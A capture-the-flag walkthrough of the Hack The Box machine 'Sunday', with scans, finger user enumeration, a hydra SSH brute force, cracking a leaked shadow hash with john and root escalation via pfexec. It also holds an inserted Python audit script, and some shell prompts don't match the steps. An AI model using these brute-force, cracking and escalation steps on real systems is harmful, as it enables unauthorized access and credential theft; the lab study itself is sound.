Details
This machine is Sunday from Hack The Box
Recon
I started an nmap scan, but it was taking far too long, so I set up a masscan
root@kali:~# masscan -p0-65335,U:0-65335 --rate=1000 -i tun0 10.10.10.76
Discovered open port 35642/tcp on 10.10.10.76
Discovered open port 54116/tcp on 10.10.10.76
Discovered open port 22022/tcp on 10.10.10.76
Discovered open port 111/tcp on 10.10.10.76
Discovered open port 79/tcp on 10.10.10.76
Then I nmapped the open ports only
root@kali:~# nmap -sV -p35642,54116,22022,111,79 -T4 10.10.10.76
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-13 12:00 EDT
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 60.00% done; ETC: 12:01 (0:00:15 remaining)
Nmap scan report for 10.10.10.76
Host is up (0.031s latency).
PORT STATE SERVICE VERSION
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (RPC #100000)
22022/tcp open ssh SunSSH 1.3 (protocol 2.0)
35642/tcp open smserverd 1 (RPC #100155)
54116/tcp open unknown
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.00 seconds
User
I used finger-user-enum from https://raw.githubusercontent.com/pentestmonkey/finger-user-enum/master/finger-user-enum.pl
root@kali:~# ./finger-user-enum.pl -U /usr/share/wordlists/rockyou.txt -t 10.10.10.76
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/rockyou.txt
Target count ............. 1
Username count ........... 14344392
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Sat Jul 13 12:16:27 2019 #########
sammy@10.10.10.76: sammy pts/2 <Apr 24, 2018> 10.10.14.4
sunny@10.10.10.76: sunny pts/3 <Apr 24, 2018> 10.10.14.4
I had 2 potential usernames, so I saved them as users.txt and pointed hydra at the SSH service
root@kali:~# hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -s 22022 10.10.10.76 ssh
[SNIP]
[22022][ssh] host: 10.10.10.76 login: sunny password: sunday
[SNIP]
I tried to log in with the creds
root@kali:~# ssh sunny@10.10.10.76 -p 22022
Unable to negotiate with 10.10.10.76 port 22022: no matching key exchange method found. Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
Weird, so I specified a valid key exchange
root@kali:~# ssh sunny@10.10.10.76 -p 22022 -o KeXAlgorithms=diffie-hellman-group1-sha1
sunny@sunday:~$
There we go
sunny@sunday:~$ sudo -l
User sunny may run the following commands on this host:
(root) NOPASSWD: /root/troll
I tested it
sunny@sunday:~$ sudo /root/troll
testing
uid=0(root) gid=0(root)
It seemed to actually be a troll, so I carried on my enum, eventually finding /backup
sunny@sunday:~$ cd /backup
sunny@sunday:/backup$ ls -la
drwxr-xr-x 2 root root 4 2018-04-15 20:44 .
drwxr-xr-x 26 root root 27 2018-04-24 12:57 ..
-r-x--x--x 1 root root 53 2018-04-24 10:35 agent22.backup
-rw-r--r-- 1 root root 319 2018-04-15 20:44 shadow.backup
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
I saved sammy's hash as crack.txt and set john on it
root@kali:~# john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cooldude! (sammy)
1g 0:00:00:27 DONE (2019-07-13 13:36) 0.03591g/s 7356p/s 7356c/s 7356C/s domonique1..bluenote
Use the "--show" option to display all of the cracked passwords reliably
Session completed
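To show what the world-readable /backup/shadow.backup above actually leaks, here is an added audit script (not part of the original writeup) that parses the Solaris shadow(4) entries, classifies each password field, reports the hash algorithm and iteration count that john identified, and converts the lastchg field to a date. The file contents are embedded as constructed sample data copied from the listing above.

```python
import re
from datetime import date, timedelta
# Constructed copy of the world-readable /backup/shadow.backup listing shown in
# the walkthrough; the two hash strings are the ones printed on the page.
SHADOW_BACKUP = """\
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
"""
HASH_TYPES = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt"}

def classify(pw):
    """Solaris shadow(4) password field: NP = no password, *LK* = locked, $id$ = crypt hash."""
    if pw == "NP":
        return "no-password"
    if pw.startswith("*LK*"):
        return "locked"
    m = re.match(r"^\$([^$]+)\$", pw)
    return "hash:" + HASH_TYPES.get(m.group(1), "unknown") if m else "other"

def hash_rounds(pw):
    """Iteration count of a crypt hash; None if the field is not a hash."""
    if not pw.startswith("$"):
        return None
    m = re.search(r"\$rounds=(\d+)\$", pw)
    return int(m.group(1)) if m else 5000  # sha256crypt default, as john reported above

def lastchg_date(days):
    return date(1970, 1, 1) + timedelta(days=int(days))  # lastchg = days since epoch

def audit(text):
    """Map each user to (status, rounds, last password change) for the whole backup."""
    result = {}
    for line in filter(None, text.splitlines()):
        user, pw, lastchg = line.split(":")[:3]
        result[user] = (classify(pw), hash_rounds(pw),
                        lastchg_date(lastchg) if lastchg else None)
    return result

def exposed_hashes(text):
    """Accounts whose hash a leaked shadow copy hands to an offline cracker."""
    return sorted(u for u, (s, _, _) in audit(text).items() if s.startswith("hash:"))
```

Only the two real user accounts carry crackable hashes; the system accounts are NP or locked, and sunny's lastchg lands on the same day the backup was written.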
I then su'd
sunny@sunday:/backup$ su sammy
sunny@sunday:/backup$
User sammy may run the following commands on this host:
(root) NOPASSWD: /usr/bin/wget
I can run wget as root, so I could use this to write as root and grant myself extra privs, but as it's a Solaris machine, I checked the profiles too
sunny@sunday:/backup$ profiles -l
Primary Administrator:
* uid=0, gid=0
Basic Solaris User:
/usr/bin/cdda2wav.bin privs=file_dac_read,sys_devices,proc_priocntl,net_privaddr
/usr/bin/cdrecord.bin privs=file_dac_read,sys_devices,proc_lock_memory,proc_priocntl,net_privaddr
/usr/bin/readcd.bin privs=file_dac_read,sys_devices,net_privaddr
/usr/lib/fs/smbfs/mount privs=sys_mount
/usr/lib/fs/smbfs/umount privs=sys_mount
All:
*
This means I can run pfexec as root
sunny@sunday:/backup$ pfexec bash
sunny@sunday:/backup# id
uid=0(root) gid=0(root) groups=10(staff)
Then I found my flags
sunny@sunday:~# find / -name user.txt 2>/dev/null
/export/home/sammy/Desktop/user.txt
sunny@sunday:~# cat /export/home/sammy/Desktop/user.txt
[REDACTED]
sunny@sunday:~# cd /root
sunny@sunday:/root# ls -la
drwx------ 6 root root 13 2018-04-24 10:31 .
drwxr-xr-x 26 root root 27 2018-04-24 12:57 ..
-rw-r--r-- 1 root root 280 2009-05-14 21:18 .bashrc
drwx------ 3 root root 3 2018-04-15 20:22 .config
drwx------ 3 root root 3 2018-04-24 09:30 .gconf
drwx------ 2 root root 3 2018-04-15 20:23 .gconfd
-rwx------ 1 root root 112 2018-04-24 10:48 overwrite
-rw-r--r-- 1 root root 611 2009-05-14 21:18 .profile
-rw------- 1 root root 1365 2018-04-15 20:23 .recently-used.xbel
-r-------- 1 root root 33 2018-04-15 20:38 root.txt
drwx------ 3 root root 3 2018-04-15 20:30 .sunw
-r-x--x--x 1 root root 53 2019-07-13 17:42 troll
-rw------- 1 root root 53 2018-04-24 10:35 troll.original
sunny@sunday:/root# cat root.txt
[REDACTED]